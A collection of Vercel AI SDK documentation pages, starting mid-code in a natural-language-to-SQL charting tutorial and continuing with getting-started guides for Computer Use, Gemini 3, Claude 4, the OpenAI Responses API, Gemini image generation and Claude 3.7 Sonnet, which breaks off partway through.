      ${sqlQuery}`,
      schema: explanationSchema,
      output: 'array',
    });
    return result.object;
  } catch (e) {
    console.error(e);
    throw new Error('Failed to generate query');
  }
};

Update query viewer

/* ...other imports... */
import { explainQuery } from '@/app/actions';

/* ...rest of the component... */

const handleExplainQuery = async () => {
  setQueryExpanded(true);
  setLoadingExplanation(true);

  const explanations = await explainQuery(inputValue, activeQuery);
  setQueryExplanations(explanations);

  setLoadingExplanation(false);
};

/* ...rest of the component... */

Now when users click the explanation button (the question mark icon), the component will:

Show a loading state
Send the active SQL query and the users natural language query to your Server Action
The model will generate an array of explanations
The explanations will be set in the component state and rendered in the UI

Submit a new query and then click the explanation button. Hover over different elements of the query. You should see the explanations for each section!

Visualizing query results

Finally, let's render the query results visually in a chart. There are two approaches you could take:

Send both the query and data to the model and ask it to return the data in a visualization-ready format. While this provides complete control over the visualization, it requires the model to send back all of the data, which significantly increases latency and costs.
Send the query and data to the model and ask it to generate a chart configuration (fixed-size and not many tokens) that maps your data appropriately. This configuration specifies how to visualize the information while delivering the insights from your natural language query. Importantly, this is done without requiring the model return the full dataset.

Since you don't know the SQL query or data shape beforehand, let's use the second approach to dynamically generate chart configurations based on the query results and user intent.

Generate the chart configuration

Chart type (bar, line, area, or pie)
Axis mappings
Visual styling

Let's start by defining the schema for the chart configuration in lib/types.ts:

/* ...rest of the file... */

export const configSchema = z
  .object({
    description: z
      .string()
      .describe(
        'Describe the chart. What is it showing? What is interesting about the way the data is displayed?',
      ),
    takeaway: z.string().describe('What is the main takeaway from the chart?'),
    type: z.enum(['bar', 'line', 'area', 'pie']).describe('Type of chart'),
    title: z.string(),
    xKey: z.string().describe('Key for x-axis or category'),
    yKeys: z
      .array(z.string())
      .describe(
        'Key(s) for y-axis values this is typically the quantitative column',
      ),
    multipleLines: z
      .boolean()
      .describe(
        'For line charts only: whether the chart is comparing groups of data.',
      )
      .optional(),
    measurementColumn: z
      .string()
      .describe(
        'For line charts only: key for quantitative y-axis column to measure against (eg. values, counts etc.)',
      )
      .optional(),
    lineCategories: z
      .array(z.string())
      .describe(
        'For line charts only: Categories used to compare different lines or data series. Each category represents a distinct line in the chart.',
      )
      .optional(),
    colors: z
      .record(
        z.string().describe('Any of the yKeys'),
        z.string().describe('Color value in CSS format (e.g., hex, rgb, hsl)'),
      )
      .describe('Mapping of data keys to color values for chart elements')
      .optional(),
    legend: z.boolean().describe('Whether to show legend'),
  })
  .describe('Chart configuration object');

export type Config = z.infer<typeof configSchema>;

Create the Server Action

Create a new action in app/actions.ts:

/* ...other imports... */
import { Config, configSchema, explanationsSchema, Result } from '@/lib/types';

/* ...rest of the file... */

export const generateChartConfig = async (
  results: Result[],
  userQuery: string,
) => {
  'use server';

  try {
    const { object: config } = await generateObject({
      model: 'openai/gpt-4o',
      system: 'You are a data visualization expert.',
      prompt: `Given the following data from a SQL query result, generate the chart config that best visualises the data and answers the users query.
      For multiple groups use multi-lines.

      Here is an example complete config:
      export const chartConfig = {
        type: "pie",
        xKey: "month",
        yKeys: ["sales", "profit", "expenses"],
        colors: {
          sales: "#4CAF50",    // Green for sales
          profit: "#2196F3",   // Blue for profit
          expenses: "#F44336"  // Red for expenses
        },
        legend: true
      }

      User Query:
      ${userQuery}

      Data:
      ${JSON.stringify(results, null, 2)}`,
      schema: configSchema,
    });

    // Override with shadcn theme colors
    const colors: Record<string, string> = {};
    config.yKeys.forEach((key, index) => {
      colors[key] = `hsl(var(--chart-${index + 1}))`;
    });

    const updatedConfig = { ...config, colors };
    return { config: updatedConfig };
  } catch (e) {
    console.error(e);
    throw new Error('Failed to generate chart suggestion');
  }
};

Update the chart component

With the action in place, you'll want to trigger it automatically after receiving query results. This ensures the visualization appears almost immediately after data loads.

Update the handleSubmit function in your root page (app/page.tsx) to generate and set the chart configuration after running the query:

/* ...other imports... */
import { getCompanies, generateQuery, generateChartConfig } from './actions';

/* ...rest of the file... */
const handleSubmit = async (suggestion?: string) => {
  clearExistingData();

  const question = suggestion ?? inputValue;
  if (inputValue.length === 0 && !suggestion) return;

  if (question.trim()) {
    setSubmitted(true);
  }

  setLoading(true);
  setLoadingStep(1);
  setActiveQuery('');

  try {
    const query = await generateQuery(question);

    if (query === undefined) {
      toast.error('An error occurred. Please try again.');
      setLoading(false);
      return;
    }

    setActiveQuery(query);
    setLoadingStep(2);

    const companies = await runGeneratedSQLQuery(query);
    const columns = companies.length > 0 ? Object.keys(companies[0]) : [];
    setResults(companies);
    setColumns(columns);

    setLoading(false);

    const { config } = await generateChartConfig(companies, question);
    setChartConfig(config);
  } catch (e) {
    toast.error('An error occurred. Please try again.');
    setLoading(false);
  }
};

/* ...rest of the file... */

Now when users submit queries, the application will:

Generate and run the SQL query
Display the table results
Generate a chart configuration for the results
Allow toggling between table and chart views

Head back to the browser and test the application with a few queries. You should see the chart visualization appear after the table results.

Next steps

You've built an AI-powered SQL analysis tool that can convert natural language to SQL queries, visualize query results, and explain SQL queries in plain English.

title: Get started with Computer Use description: Get started with Claude's Computer Use capabilities with the AI SDK tags: ['computer-use', 'tools']

Get started with Computer Use

Computer Use

Anthropic recently released a new version of the Claude 3.5 Sonnet model which is capable of 'Computer Use'. This allows the model to interact with computer interfaces through basic actions like:

Moving the cursor
Clicking buttons
Typing text
Taking screenshots
Reading screen content

How It Works

Computer Use enables the model to read and interact with on-screen content through a series of coordinated steps. Here's how the process works:

Start with a prompt and tools

Add Anthropic-defined Computer Use tools to your request and provide a task (prompt) for the model. For example: "save an image to your downloads folder."
Select the right tool

The model evaluates which computer tools can help accomplish the task. It then sends a formatted tool_call to use the appropriate tool.
Execute the action and return results

The AI SDK processes Claude's request by running the selected tool. The results can then be sent back to Claude through a tool_result message.
Complete the task through iterations

Claude analyzes each result to determine if more actions are needed. It continues requesting tool use and processing results until it completes your task or requires additional input.

Available Tools

There are three main tools available in the Computer Use API:

Computer Tool: Enables basic computer control like mouse movement, clicking, and keyboard input
Text Editor Tool: Provides functionality for viewing and editing text files
Bash Tool: Allows execution of bash commands

Implementation Considerations

Set up a controlled environment for Computer Use execution
Implement core functionality like mouse control and keyboard input
Handle screenshot capture and processing
Set up rules and limits for how Claude can interact with your system

The recommended approach is to start with Anthropic's reference implementation , which provides:

A containerized environment configured for safe Computer Use
Ready-to-use (Python) implementations of Computer Use tools
An agent loop for API interaction and tool execution
A web interface for monitoring and control

This reference implementation serves as a foundation to understand the requirements before building your own custom solution.

Getting Started with the AI SDK

First, ensure you have the AI SDK and Anthropic AI SDK provider installed:

Here's how you could set up the Computer Tool with the AI SDK:

import { anthropic } from '@ai-sdk/anthropic';
import { getScreenshot, executeComputerAction } from '@/utils/computer-use';

const computerTool = anthropic.tools.computer_20250124({
  displayWidthPx: 1920,
  displayHeightPx: 1080,
  execute: async ({ action, coordinate, text }) => {
    switch (action) {
      case 'screenshot': {
        return {
          type: 'image',
          data: getScreenshot(),
        };
      }
      default: {
        return executeComputerAction(action, coordinate, text);
      }
    }
  },
  toModelOutput(result) {
    return typeof result === 'string'
      ? [{ type: 'text', text: result }]
      : [{ type: 'image', data: result.data, mediaType: 'image/png' }];
  },
});

Finally, to send tool results back to the model, use the toModelOutput() function to convert text and image responses into a format the model can process. The AI SDK includes experimental support for these multi-modal tool results when using Anthropic's models.

Using Computer Tools with Text Generation

Once your tool is defined, you can use it with both the generateText and streamText functions.

For one-shot text generation, use generateText:

const result = await generateText({
  model: 'anthropic/claude-sonnet-4-20250514',
  prompt: 'Move the cursor to the center of the screen and take a screenshot',
  tools: { computer: computerTool },
});

console.log(result.text);

For streaming responses, use streamText to receive updates in real-time:

const result = streamText({
  model: 'anthropic/claude-sonnet-4-20250514',
  prompt: 'Open the browser and navigate to vercel.com',
  tools: { computer: computerTool },
});

for await (const chunk of result.textStream) {
  console.log(chunk);
}

Configure Multi-Step (Agentic) Generations

To allow the model to perform multiple steps without user intervention, use the stopWhen parameter. This will automatically send any tool results back to the model to trigger a subsequent generation:

import { stepCountIs } from 'ai';

const stream = streamText({
  model: 'anthropic/claude-sonnet-4-20250514',
  prompt: 'Open the browser and navigate to vercel.com',
  tools: { computer: computerTool },
  stopWhen: stepCountIs(10), // experiment with this value based on your use case
});

Combine Multiple Tools

You can combine multiple tools in a single request to enable more complex workflows. The AI SDK supports all three of Claude's Computer Use tools:

const computerTool = anthropic.tools.computer_20250124({
  ...
});

const bashTool = anthropic.tools.bash_20250124({
  execute: async ({ command, restart }) => execSync(command).toString()
});

const textEditorTool = anthropic.tools.textEditor_20250124({
  execute: async ({
    command,
    path,
    file_text,
    insert_line,
    new_str,
    old_str,
    view_range
  }) => {
    // Handle file operations based on command
    switch(command) {
      return executeTextEditorFunction({
        command,
        path,
        fileText: file_text,
        insertLine: insert_line,
        newStr: new_str,
        oldStr: old_str,
        viewRange: view_range
      });
    }
  }
});


const response = await generateText({
  model: 'anthropic/claude-sonnet-4-20250514',
  prompt: "Create a new file called example.txt, write 'Hello World' to it, and run 'cat example.txt' in the terminal",
  tools: {
    computer: computerTool,
    bash: bashTool,
    str_replace_editor: textEditorTool,
  },
});

Best Practices for Computer Use

To get the best results when using Computer Use:

Specify simple, well-defined tasks with explicit instructions for each step
Prompt Claude to verify outcomes through screenshots
Use keyboard shortcuts when UI elements are difficult to manipulate
Include example screenshots for repeatable tasks
Provide explicit tips in system prompts for known tasks

Security Measures

Use a dedicated virtual machine or container with minimal privileges to prevent direct system attacks or accidents.
Avoid giving the model access to sensitive data, such as account login information, to prevent information theft.
Limit internet access to an allowlist of domains to reduce exposure to malicious content.
Ask a human to confirm decisions that may result in meaningful real-world consequences as well as any tasks requiring affirmative consent, such as accepting cookies, executing financial transactions, or agreeing to terms of service.

title: Get started with Gemini 3 description: Get started with Gemini 3 using the AI SDK. tags: ['getting-started']

Get started with Gemini 3

With the release of Gemini 3, Google's most intelligent model to date, there has never been a better time to start building AI applications that combine state-of-the-art reasoning with multimodal understanding.

The AI SDK is a powerful TypeScript toolkit for building AI applications with large language models (LLMs) like Gemini 3 alongside popular frameworks like React, Next.js, Vue, Svelte, Node.js, and more.

Gemini 3

Gemini 3 represents a significant leap forward in AI capabilities, combining all of Gemini's strengths together to help you bring any idea to life. It delivers:

State-of-the-art reasoning with unprecedented depth and nuance
PhD-level performance on complex benchmarks like Humanity's Last Exam (37.5%) and GPQA Diamond (91.9%)
Leading multimodal understanding with 81% on MMMU-Pro and 87.6% on Video-MMMU
Best-in-class vibe coding and agentic capabilities
Superior long-horizon planning for multi-step workflows

Gemini 3 Pro is currently available in preview, offering great performance across all benchmarks.

Getting Started with the AI SDK

The AI SDK abstracts away the differences between model providers, eliminates boilerplate code for building chatbots, and allows you to go beyond text output to generate rich, interactive components.

At the center of the AI SDK is AI SDK Core, which provides a unified API to call any LLM. The code snippet below is all you need to call Gemini 3 with the AI SDK:

import { google } from '@ai-sdk/google';
import { generateText } from 'ai';

const { text } = await generateText({
  model: google('gemini-3-pro-preview'),
  prompt: 'Explain the concept of the Hilbert space.',
});
console.log(text);

Enhanced Reasoning with Thinking Mode

Gemini 3 Pro can use enhanced reasoning through thinking mode, which improves its ability to solve complex problems. You can control the thinking level using the thinkingLevel provider option:

import { google, GoogleGenerativeAIProviderOptions } from '@ai-sdk/google';
import { generateText } from 'ai';

const { text } = await generateText({
  model: google('gemini-3-pro-preview'),
  prompt: 'What is the sum of the first 10 prime numbers?',
  providerOptions: {
    google: {
      thinkingConfig: {
        includeThoughts: true,
        thinkingLevel: 'low',
      },
    } satisfies GoogleGenerativeAIProviderOptions,
  },
});

console.log(text);

The thinkingLevel parameter accepts values like 'low' or 'high' to control the depth of reasoning applied to your prompt.

Using Tools with the AI SDK

Gemini 3 excels at tool calling with improved reliability and consistency for multi-step workflows. Here's an example of using tool calling with the AI SDK:

import { z } from 'zod';
import { generateText, tool, stepCountIs } from 'ai';
import { google } from '@ai-sdk/google';

const result = await generateText({
  model: google('gemini-3-pro-preview'),
  prompt: 'What is the weather in San Francisco?',
  tools: {
    weather: tool({
      description: 'Get the weather in a location',
      inputSchema: z.object({
        location: z.string().describe('The location to get the weather for'),
      }),
      execute: async ({ location }) => ({
        location,
        temperature: 72 + Math.floor(Math.random() * 21) - 10,
      }),
    }),
  },
  stopWhen: stepCountIs(5), // enables multi-step calling
});

console.log(result.text);

console.log(result.steps);

Using Google Search with Gemini

With search grounding, Gemini can access the latest information using Google search. Here's an example of using Google Search with the AI SDK:

import { google } from '@ai-sdk/google';
import { GoogleGenerativeAIProviderMetadata } from '@ai-sdk/google';
import { generateText } from 'ai';

const { text, sources, providerMetadata } = await generateText({
  model: google('gemini-3-pro-preview'),
  tools: {
    google_search: google.tools.googleSearch({}),
  },
  prompt:
    'List the top 5 San Francisco news from the past week.' +
    'You must include the date of each article.',
});

// access the grounding metadata. Casting to the provider metadata type
// is optional but provides autocomplete and type safety.
const metadata = providerMetadata?.google as
  | GoogleGenerativeAIProviderMetadata
  | undefined;
const groundingMetadata = metadata?.groundingMetadata;
const safetyRatings = metadata?.safetyRatings;

console.log({ text, sources, groundingMetadata, safetyRatings });

Building Interactive Interfaces

AI SDK UI provides robust abstractions that simplify the complex tasks of managing chat streams and UI updates on the frontend, enabling you to develop dynamic AI-driven interfaces more efficiently.

Let's explore building a chatbot with Next.js, the AI SDK, and Gemini 3 Pro:

In a new Next.js application, first install the AI SDK and the Google Generative AI provider:

Then, create a route handler for the chat endpoint:

import { google } from '@ai-sdk/google';
import { streamText, UIMessage, convertToModelMessages } from 'ai';

export async function POST(req: Request) {
  const { messages }: { messages: UIMessage[] } = await req.json();

  const result = streamText({
    model: google('gemini-3-pro-preview'),
    messages: convertToModelMessages(messages),
  });

  return result.toUIMessageStreamResponse();
}

Finally, update the root page (app/page.tsx) to use the useChat hook:

'use client';

import { useChat } from '@ai-sdk/react';
import { useState } from 'react';

export default function Chat() {
  const [input, setInput] = useState('');
  const { messages, sendMessage } = useChat();
  return (
    <div className="flex flex-col w-full max-w-md py-24 mx-auto stretch">
      {messages.map(message => (
        <div key={message.id} className="whitespace-pre-wrap">
          {message.role === 'user' ? 'User: ' : 'Gemini: '}
          {message.parts.map((part, i) => {
            switch (part.type) {
              case 'text':
                return <div key={`${message.id}-${i}`}>{part.text}</div>;
            }
          })}
        </div>
      ))}

      <form
        onSubmit={e => {
          e.preventDefault();
          sendMessage({ text: input });
          setInput('');
        }}
      >
        <input
          className="fixed dark:bg-zinc-900 bottom-0 w-full max-w-md p-2 mb-8 border border-zinc-300 dark:border-zinc-800 rounded shadow-xl"
          value={input}
          placeholder="Say something..."
          onChange={e => setInput(e.currentTarget.value)}
        />
      </form>
    </div>
  );
}

Get Started

Ready to dive in? Here's how you can begin:

Explore the documentation at ai-sdk.dev/docs to understand the capabilities of the AI SDK.
Check out practical examples at ai-sdk.dev/examples to see the SDK in action.
Dive deeper with advanced guides on topics like Retrieval-Augmented Generation (RAG) at ai-sdk.dev/docs/guides.
Use ready-to-deploy AI templates at vercel.com/templates?type=ai.
Read more about the Google Generative AI provider.

title: Get started with Claude 4 description: Get started with Claude 4 using the AI SDK. tags: ['getting-started']

Get started with Claude 4

With the release of Claude 4, there has never been a better time to start building AI applications, particularly those that require complex reasoning capabilities and advanced intelligence.

Claude 4

Prompt Engineering for Claude 4 Models

Claude 4 models respond well to clear, explicit instructions. The following best practices can help achieve optimal performance:

Provide explicit instructions: Clearly state what you want the model to do, including specific steps or formats for the response.
Include context and motivation: Explain why a task is being performed to help the model better understand the underlying goals.
Avoid negative examples: When providing examples, only demonstrate the behavior you want to see, not what you want to avoid.

Getting Started with the AI SDK

The AI SDK abstracts away the differences between model providers, eliminates boilerplate code for building chatbots, and allows you to go beyond text output to generate rich, interactive components.

At the center of the AI SDK is AI SDK Core, which provides a unified API to call any LLM. The code snippet below is all you need to call Claude 4 Sonnet with the AI SDK:

import { anthropic } from '@ai-sdk/anthropic';
import { generateText } from 'ai';

const { text, reasoningText, reasoning } = await generateText({
  model: anthropic('claude-sonnet-4-20250514'),
  prompt: 'How will quantum computing impact cryptography by 2050?',
});
console.log(text);

Reasoning Ability

import { anthropic, AnthropicProviderOptions } from '@ai-sdk/anthropic';
import { generateText } from 'ai';

const { text, reasoningText, reasoning } = await generateText({
  model: anthropic('claude-sonnet-4-20250514'),
  prompt: 'How will quantum computing impact cryptography by 2050?',
  providerOptions: {
    anthropic: {
      thinking: { type: 'enabled', budgetTokens: 15000 },
    } satisfies AnthropicProviderOptions,
  },
  headers: {
    'anthropic-beta': 'interleaved-thinking-2025-05-14',
  },
});

console.log(text); // text response
console.log(reasoningText); // reasoning text
console.log(reasoning); // reasoning details including redacted reasoning

Building Interactive Interfaces

AI SDK UI provides robust abstractions that simplify the complex tasks of managing chat streams and UI updates on the frontend, enabling you to develop dynamic AI-driven interfaces more efficiently.

Let's explore building a chatbot with Next.js, the AI SDK, and Claude Sonnet 4:

In a new Next.js application, first install the AI SDK and the Anthropic provider:

Then, create a route handler for the chat endpoint:

import { anthropic, AnthropicProviderOptions } from '@ai-sdk/anthropic';
import { streamText, convertToModelMessages, type UIMessage } from 'ai';

export async function POST(req: Request) {
  const { messages }: { messages: UIMessage[] } = await req.json();

  const result = streamText({
    model: anthropic('claude-sonnet-4-20250514'),
    messages: convertToModelMessages(messages),
    headers: {
      'anthropic-beta': 'interleaved-thinking-2025-05-14',
    },
    providerOptions: {
      anthropic: {
        thinking: { type: 'enabled', budgetTokens: 15000 },
      } satisfies AnthropicProviderOptions,
    },
  });

  return result.toUIMessageStreamResponse({
    sendReasoning: true,
  });
}

Finally, update the root page (app/page.tsx) to use the useChat hook:

'use client';

import { useChat } from '@ai-sdk/react';
import { DefaultChatTransport } from 'ai';
import { useState } from 'react';

export default function Page() {
  const [input, setInput] = useState('');
  const { messages, sendMessage } = useChat({
    transport: new DefaultChatTransport({ api: '/api/chat' }),
  });

  const handleSubmit = (e: React.FormEvent) => {
    e.preventDefault();
    if (input.trim()) {
      sendMessage({ text: input });
      setInput('');
    }
  };

  return (
    <div className="flex flex-col h-screen max-w-2xl mx-auto p-4">
      <div className="flex-1 overflow-y-auto space-y-4 mb-4">
        {messages.map(message => (
          <div
            key={message.id}
            className={`p-3 rounded-lg ${
              message.role === 'user' ? 'bg-blue-50 ml-auto' : 'bg-gray-50'
            }`}
          >
            <p className="font-semibold">
              {message.role === 'user' ? 'You' : 'Claude 4'}
            </p>
            {message.parts.map((part, index) => {
              if (part.type === 'text') {
                return (
                  <div key={index} className="mt-1">
                    {part.text}
                  </div>
                );
              }
              if (part.type === 'reasoning') {
                return (
                  <pre
                    key={index}
                    className="bg-gray-100 p-2 rounded mt-2 text-xs overflow-x-auto"
                  >
                    <details>
                      <summary className="cursor-pointer">
                        View reasoning
                      </summary>
                      {part.text}
                    </details>
                  </pre>
                );
              }
            })}
          </div>
        ))}
      </div>
      <form onSubmit={handleSubmit} className="flex gap-2">
        <input
          name="prompt"
          value={input}
          onChange={e => setInput(e.target.value)}
          className="flex-1 p-2 border rounded focus:outline-none focus:ring-2 focus:ring-blue-500"
          placeholder="Ask Claude 4 something..."
        />
        <button
          type="submit"
          className="bg-blue-500 text-white px-4 py-2 rounded hover:bg-blue-600"
        >
          Send
        </button>
      </form>
    </div>
  );
}

The useChat hook on your root page (app/page.tsx) will make a request to your LLM provider endpoint (app/api/chat/route.ts) whenever the user submits a message. The messages are then displayed in the chat UI.

Claude 4 Model Variants

Claude 4 is available in two variants, each optimized for different use cases:

Claude Sonnet 4: Balanced performance suitable for most enterprise applications, with significant improvements over Sonnet 3.7.
Claude Opus 4: Anthropic's most powerful model and the best coding model available. Excels at sustained performance on long-running tasks that require focused effort and thousands of steps, with the ability to work continuously for several hours.

Get Started

Ready to dive in? Here's how you can begin:

Explore the documentation at ai-sdk.dev/docs to understand the capabilities of the AI SDK.
Check out practical examples at ai-sdk.dev/examples to see the SDK in action.
Dive deeper with advanced guides on topics like Retrieval-Augmented Generation (RAG) at ai-sdk.dev/docs/guides.
Use ready-to-deploy AI templates at vercel.com/templates?type=ai.

title: OpenAI Responses API description: Get started with the OpenAI Responses API using the AI SDK. tags: ['getting-started', 'agents']

Get started with OpenAI Responses API

With the release of OpenAI's responses API, there has never been a better time to start building AI applications, particularly those that require a deeper understanding of the world.

The AI SDK is a powerful TypeScript toolkit for building AI applications with large language models (LLMs) alongside popular frameworks like React, Next.js, Vue, Svelte, Node.js, and more.

OpenAI Responses API

Getting Started with the AI SDK

The AI SDK abstracts away the differences between model providers, eliminates boilerplate code for building chatbots, and allows you to go beyond text output to generate rich, interactive components.

At the center of the AI SDK is AI SDK Core, which provides a unified API to call any LLM. The code snippet below is all you need to call GPT-4o with the new Responses API using the AI SDK:

import { generateText } from 'ai';
import { openai } from '@ai-sdk/openai';

const { text } = await generateText({
  model: openai.responses('gpt-4o'),
  prompt: 'Explain the concept of quantum entanglement.',
});

Generating Structured Data

import { generateObject } from 'ai';
import { openai } from '@ai-sdk/openai';
import { z } from 'zod';

const { object } = await generateObject({
  model: openai.responses('gpt-4o'),
  schema: z.object({
    recipe: z.object({
      name: z.string(),
      ingredients: z.array(z.object({ name: z.string(), amount: z.string() })),
      steps: z.array(z.string()),
    }),
  }),
  prompt: 'Generate a lasagna recipe.',
});

This code snippet will generate a type-safe recipe that conforms to the specified zod schema.

Using Tools with the AI SDK

The Responses API supports tool calling out of the box, allowing it to interact with external systems and perform discrete tasks. Here's an example of using tool calling with the AI SDK:

import { generateText, tool } from 'ai';
import { openai } from '@ai-sdk/openai';
import { z } from 'zod';

const { text } = await generateText({
  model: openai.responses('gpt-4o'),
  prompt: 'What is the weather like today in San Francisco?',
  tools: {
    getWeather: tool({
      description: 'Get the weather in a location',
      inputSchema: z.object({
        location: z.string().describe('The location to get the weather for'),
      }),
      execute: async ({ location }) => ({
        location,
        temperature: 72 + Math.floor(Math.random() * 21) - 10,
      }),
    }),
  },
  stopWhen: stepCountIs(5), // enable multi-step 'agentic' LLM calls
});

This example demonstrates how stopWhen transforms a single LLM call into an agent. The stopWhen: stepCountIs(5) parameter allows the model to autonomously call tools, analyze results, and make additional tool calls as needed - turning what would be a simple one-shot completion into an intelligent agent that can chain multiple actions together to complete complex tasks.

Web Search Tool

The Responses API introduces a built-in tool for grounding responses called webSearch. With this tool, the model can access the internet to find relevant information for its responses.

import { openai } from '@ai-sdk/openai';
import { generateText } from 'ai';

const result = await generateText({
  model: openai.responses('gpt-4o-mini'),
  prompt: 'What happened in San Francisco last week?',
  tools: {
    web_search_preview: openai.tools.webSearchPreview(),
  },
});

console.log(result.text);
console.log(result.sources);

The webSearch tool also allows you to specify query-specific metadata that can be used to improve the quality of the search results.

import { generateText } from 'ai';

const result = await generateText({
  model: openai.responses('gpt-4o-mini'),
  prompt: 'What happened in San Francisco last week?',
  tools: {
    web_search_preview: openai.tools.webSearchPreview({
      searchContextSize: 'high',
      userLocation: {
        type: 'approximate',
        city: 'San Francisco',
        region: 'California',
      },
    }),
  },
});

console.log(result.text);
console.log(result.sources);

Using Persistence

With the Responses API, you can persist chat history with OpenAI across requests. This allows you to send just the user's last message and OpenAI can access the entire chat history.

There are two options available to use persistence:

With previousResponseId

import { openai } from '@ai-sdk/openai';
import { generateText } from 'ai';

const result1 = await generateText({
  model: openai.responses('gpt-4o-mini'),
  prompt: 'Invent a new holiday and describe its traditions.',
});

const result2 = await generateText({
  model: openai.responses('gpt-4o-mini'),
  prompt: 'Summarize in 2 sentences',
  providerOptions: {
    openai: {
      previousResponseId: result1.providerMetadata?.openai.responseId as string,
    },
  },
});

With Conversations

You can use the Conversation API to create a conversation.

Once you have created a conversation, you can continue it:

import { openai } from '@ai-sdk/openai';
import { generateText } from 'ai';

const result = await generateText({
  model: openai.responses('gpt-4o-mini'),
  prompt: 'Summarize in 2 sentences',
  providerOptions: {
    openai: {
      // The Conversation ID created via the OpenAI API to continue
      conversation: 'conv_123',
    },
  },
});

Migrating from Completions API

Migrating from the OpenAI Completions API (via the AI SDK) to the new Responses API is simple. To migrate, simply change your provider instance from openai(modelId) to openai.responses(modelId):

import { generateText } from 'ai';
import { openai } from '@ai-sdk/openai';

// Completions API
const { text } = await generateText({
  model: openai('gpt-4o'),
  prompt: 'Explain the concept of quantum entanglement.',
});

// Responses API
const { text } = await generateText({
  model: openai.responses('gpt-4o'),
  prompt: 'Explain the concept of quantum entanglement.',
});

When using the Responses API, provider specific options that were previously specified on the model provider instance have now moved to the providerOptions object:

import { generateText } from 'ai';
import { openai } from '@ai-sdk/openai';

// Completions API
const { text } = await generateText({
  model: openai('gpt-4o'),
  prompt: 'Explain the concept of quantum entanglement.',
  providerOptions: {
    openai: {
      parallelToolCalls: false,
    },
  },
});

// Responses API
const { text } = await generateText({
  model: openai.responses('gpt-4o'),
  prompt: 'Explain the concept of quantum entanglement.',
  providerOptions: {
    openai: {
      parallelToolCalls: false,
    },
  },
});

Get Started

Ready to get started? Here's how you can dive in:

Explore the documentation at ai-sdk.dev/docs to understand the full capabilities of the AI SDK.
Check out practical examples at ai-sdk.dev/examples to see the SDK in action and get inspired for your own projects.
Dive deeper with advanced guides on topics like Retrieval-Augmented Generation (RAG) and multi-modal chat at ai-sdk.dev/docs/guides.
Check out ready-to-deploy AI templates at vercel.com/templates?type=ai.

title: Google Gemini Image Generation description: Generate and edit images with Google Gemini 2.5 Flash Image using the AI SDK. tags: ['image-generation', 'google', 'gemini']

Generate and Edit Images with Google Gemini 2.5 Flash

This guide will show you how to generate and edit images with the AI SDK and Google's latest multimodal language model Gemini 2.5 Flash Image.

Generating Images

As Gemini 2.5 Flash Image is a language model with multimodal capabilities, you can use the generateText or streamText functions (not generateImage) to create images. The model determines which modality to respond in based on your prompt and configuration. Here's how to create your first image:

import { generateText } from 'ai';
import fs from 'node:fs';
import 'dotenv/config';

async function generateImage() {
  const result = await generateText({
    model: 'google/gemini-2.5-flash-image',
    prompt:
      'Create a picture of a nano banana dish in a fancy restaurant with a Gemini theme',
  });

  // Save generated images
  for (const file of result.files) {
    if (file.mediaType.startsWith('image/')) {
      const timestamp = Date.now();
      const fileName = `generated-${timestamp}.png`;

      fs.mkdirSync('output', { recursive: true });
      await fs.promises.writeFile(`output/${fileName}`, file.uint8Array);

      console.log(`Generated and saved image: output/${fileName}`);
    }
  }
}

generateImage().catch(console.error);

Here are some key points to remember:

Generated images are returned in the result.files array
Images are returned as Uint8Array data
The model leverages Gemini's world knowledge, so detailed prompts yield better results

Editing Images

Gemini 2.5 Flash Image excels at editing existing images with natural language instructions. You can add elements, modify styles, or transform images while maintaining their core characteristics:

import { generateText } from 'ai';
import fs from 'node:fs';
import 'dotenv/config';

async function editImage() {
  const editResult = await generateText({
    model: 'google/gemini-2.5-flash-image',
    prompt: [
      {
        role: 'user',
        content: [
          {
            type: 'text',
            text: 'Add a small wizard hat to this cat. Keep everything else the same.',
          },
          {
            type: 'image',
            // image: DataContent (string | Uint8Array | ArrayBuffer | Buffer) or URL
            image: new URL(
              'https://raw.githubusercontent.com/vercel/ai/refs/heads/main/examples/ai-core/data/comic-cat.png',
            ),
            mediaType: 'image/jpeg',
          },
        ],
      },
    ],
  });

  // Save the edited image
  const timestamp = Date.now();
  fs.mkdirSync('output', { recursive: true });

  for (const file of editResult.files) {
    if (file.mediaType.startsWith('image/')) {
      await fs.promises.writeFile(
        `output/edited-${timestamp}.png`,
        file.uint8Array,
      );
      console.log(`Saved edited image: output/edited-${timestamp}.png`);
    }
  }
}

editImage().catch(console.error);

What's Next?

You've learned how to generate new images from text prompts and edit existing images using natural language instructions with Google's Gemini 2.5 Flash Image model.

For more advanced techniques, integration patterns, and practical examples, check out our Cookbook where you'll find comprehensive guides for building sophisticated AI-powered applications.

title: Get started with Claude 3.7 Sonnet description: Get started with Claude 3.7 Sonnet using the AI SDK. tags: ['getting-started']

Get started with Claude 3.7 Sonnet

With the release of Claude 3.7 Sonnet, there has never been a better time to start building AI applications, particularly those that require complex reasoning capabilities.

Claude 3.7 Sonnet

Getting Started with the AI SDK

The AI SDK abstracts away the differences between model providers, eliminates boilerplate code for building chatbots, and allows you to go beyond text output to generate rich, interactive components.

At the center of the AI SDK is AI SDK Core, which provides a unified API to call any LLM. The code snippet below is all you need to call Claude 3.7 Sonnet with the AI SDK:

import { anthropic } from '@ai-sdk/anthropic';
import { generateText } from 'ai';

const { text, reasoningText, reasoning } = await generateText({
  model: anthropic('claude-3-7-sonnet-20250219'),
  prompt: 'How many people will live in the world in 2040?',
});
console.log(text); // text response

The unified interface also means that you can easily switch between providers by changing just two lines of code. For example, to use Claude 3.7 Sonnet via Amazon Bedrock:

import { bedrock } from '@ai-sdk/amazon-bedrock';
import { generateText } from 'ai';

const { reasoning, text } = await generateText({
  model: bedrock('anthropic.claude-3-7-sonnet-20250219-v1:0'),
  prompt: 'How many people will live in the world in 2040?',
});

Reasoning Ability

import { anthropic, AnthropicProviderOptions } from '@ai-sdk/anthropic';
import { generateText } from 'ai';

const { text, reasoningText, reasoning } = await generateText({
  model: anthropic('claude-3-7-sonnet-20250219'),
  prompt: 'How many people will live in the world in 2040?',
  providerOptions: {
    anthropic: {
      thinking: { type: 'enabled', budgetTokens: 12000 },
    } satisfies AnthropicProviderOptions,
  },
});

console.log(reasoningText); // reasoning text
console.log(reasoning); // reasoning details including redacted reasoning
console.log(text); // text response

Building Interactive Interfaces

AI SDK UI provides robust abstractions that simplify the complex tasks of managing chat streams and UI updates on the frontend, enabling you to develop dynamic AI-driven interfaces more efficiently.

Let's explore building a chatbot with Next.js, the AI SDK, and Claude 3.7 Sonnet:

In a new Next.js application, first install the AI SDK and the Anthropic provider:

Then, create a route handler for the chat endpoint:

import { anthropic, AnthropicProviderOptions } from '@ai-sdk/anthropic';
import { streamText, convertToModelMessages, type UIMessage } from 'ai';

